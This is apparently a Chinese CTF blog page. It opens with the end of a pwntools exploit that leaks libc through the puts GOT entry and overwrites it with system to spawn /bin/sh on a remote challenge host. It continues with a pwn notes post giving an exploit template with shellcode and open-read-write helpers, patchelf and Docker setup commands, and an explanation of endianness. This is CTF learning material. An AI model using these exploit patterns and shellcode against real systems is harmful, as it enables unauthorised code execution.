libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2061
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

def create(s,a,d,f):
    sl(b"1")
    sl(str(s))
    sl(a)
    sl(str(d))
    sl(f)

def rename(a):
    sl(b"5")
    sl(a)

def back():
    sl(b"6")

def print_book():
    sl(b"4")

def edit(s,a):
    sl(b"3")
    sl(str(s))
    sl(a)
addr = 0x00404018
puts_got = elf.got['puts']
sl(b"haoo")
p0 = b'b'
p0 = flat(1,puts_got,addr,0x80)
create(0x20,b'b',0x60,p0)
rename(b'a'*0x20)
print_book()
io.recvuntil("Name: ")
libc_base = u64(io.recv(6).ljust(8,b'\x00')) - libc.sym['puts']
leak('libc_base',libc_base)

system = libc_base+libc.sym['system']
binsh = libc_base+next(libc.search(b'/bin/sh\x00'))
stdout = libc_base+libc.sym['_IO_2_1_stdout_']
edit(1,p64(system)+p64(stdout))
rename(b"/bin/sh\x00")
back()
#连接
#--------------------------------------------------------------------------------
ioi()

后面两道题借鉴了其他师傅的wp，主要我还是太菜了，有些手法还不怎么知道，得继续加强练习了。

pwn_小记

2025-12-03T02:42:41.746Z

本文章会持续更新，用于记录pwn过程中，本人觉得值得记录的东西0v0

pwn的exp简化模板

该部分记录使用lambda表达式与自定义函数简化exp，便于未来exp的编写。

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file=''
libc_file=''
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=1
if flag:
    io=process(pwn_file)
else:
    ip=''
    port=
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu64    =   lambda data                 : u64(data.ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

#连接
#--------------------------------------------------------------------------------
ioi()

其中需要注意的是，如果设置terminal为tmux时gdb，需要在tmux下运行exp，且tmux的操作一般先是先输入CTRL+b，再接着输入命令。

patchelf

在做pwn题的过程中，有时候本地调试的环境会和远程不一样，从而导致本地通了而远程没通的情况，此时可以使用patchelf或者docker解决相应问题。因为patchelf比较简单，在这里先记录该方法。

strings ./libc-x.xx | grep ubuntu    //查看版本
./download xxxx    //在glibc-all-in-one中下载相应版本
patchelf --set-interpreter 文件夹名/ld.so ./pwn    //换掉ld
patchelf --set-rpath 文件夹名 ./pwn    //换掉path

这样一来就patch好了。当然这种方法不是万能的，glibc-all-in-one有些版本没有，有些难题对环境的要求很高，因此后续会记录docker的方法，只要知道了远程的环境，我们就能使用docker部署一个一样的环境在本地调试。

Docker

在这里只是简单介绍了docker的一些基础命令，便于在做pwn题时，与远程的环境一致，便于调试之类的。

#启动docker服务
sudo service docker start
#查看docker状态
docker ps
#拉取基础镜像
docker pull ____
#构建镜像
docker build -t ____ .
#运行镜像
docker run -d --rm \
  -p 8889:8889 \
  --name onlyfgets \
  onlyfgets
#进入docker容器
docker exec -it only_fgets /bin/bash
#关闭容器
docker stop only_fgets

大端序和小端序

在大端序中，高位字节存储在低地址，低位字节存储在高地址。这种排列方式与数据用字节表示时的书写顺序一致，符合人类的阅读习惯。例如，32位整数0x12345678在大端序下的存储顺序如下：

低地址（低位） → 高地址（高位）

0x12 → 0x34 → 0x56 → 0x78

在小端序中，低位字节存储在低地址，高位字节存储在高地址。小端序与人类的阅读习惯相反，但更符合计算机读取内存的方式，因为CPU读取内存中的数据时，是从低地址向高地址方向进行读取的。例如，32位整数0x12345678在小端序下的存储顺序如下：

低地址（低位） → 高地址（高位）

0x78 → 0x56 → 0x34 → 0x12

函数

socket

python -m http.server 8000